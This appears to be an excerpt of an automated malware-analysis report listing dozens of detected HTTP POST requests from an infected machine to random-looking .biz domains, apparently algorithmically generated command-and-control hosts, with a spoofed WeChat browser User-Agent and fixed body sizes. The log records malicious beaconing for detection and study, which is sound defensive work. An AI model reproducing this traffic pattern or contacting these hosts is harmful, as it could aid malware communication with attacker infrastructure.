                      Source: global trafficHTTP traffic detected: POST /bxfhsc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: znwbniskf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /ocs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: znwbniskf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /qewsej HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xyrgy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /fetkigfilcqliw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: htwqzczce.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /hrbxo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cpclnad.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /gpxgnogudnwutwfp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: htwqzczce.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /mrse HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mjheo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /viugrlqv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: kvbjaur.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /srl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wluwplyh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /xujyohtmhqt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uphca.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /hyugrexqyfasiql HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wluwplyh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /mog HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fjumtfnz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /snjiaqla HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hlzfuyy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /bharlojyp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zgapiej.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /h HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rffxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /fiwscepy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jifai.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /kvm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cikivjto.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /pirpxhxdplykncd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xnxvnn.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /nqkoupgvsxw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qncdaagct.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /mjdeoppfssxodohw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xnxvnn.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /etrfvwacv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ihcnogskt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /dlpiplovberhgl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: shpwbsrw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /jondjmslxg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: kkqypycm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /pccmgr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cjvgcl.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /vl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: neazudmrq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /uinjuleplpl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uevrpr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /qbuwvsdlnanro HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uevrpr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /bvcfwm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pgfsvwx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /ddokuomwifxxk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fgajqjyhr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /mvwtlissrmasl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: aatcwo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /qae HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hagujcj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /gptbqx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sctmku.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /cxinfebsgktiagqk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: kcyvxytog.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /gibgyqdir HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nwdnxrd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /sfrgkjxdtnltriqd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qcrsp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /vw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ereplfx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /x HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sewlqwcd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /npve HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dyjdrp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /llusoyfpcyhs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ptrim.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /yorclqqa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: napws.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /fluchiwdt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: znwbniskf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /xmxprfeve HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qvuhsaqa.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /oksie HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cpclnad.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /dhmgfvxgg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: apzzls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /bvahqiwv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mjheo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /cdiwtlqwpa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: krnsmlmvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /vlr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wluwplyh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /vkh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nlscndwp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /p HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zgapiej.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /upyplayhgump HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nlscndwp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /viete HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jifai.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /slunaqsqihiyn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bzkysubds.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /qxvbkapfpdvhslj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xnxvnn.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /keoxjvqkrwog HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ltpqsnu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /htexcompdpvjuveq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vnvbt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /sclfhiiab HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ihcnogskt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /fpsoixfgfcsskwmx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ypituyqsq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /monsycnhtydws HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: kkqypycm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /dl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ijnmvqa.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /cg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tltxn.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /gibqmqgsqhhj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uevrpr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /crcckyq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fgajqjyhr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /wqgsaraaxlbo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vgypotwp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /qwmduquimr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hagujcj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /ulvjoisjaywqw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: giliplg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
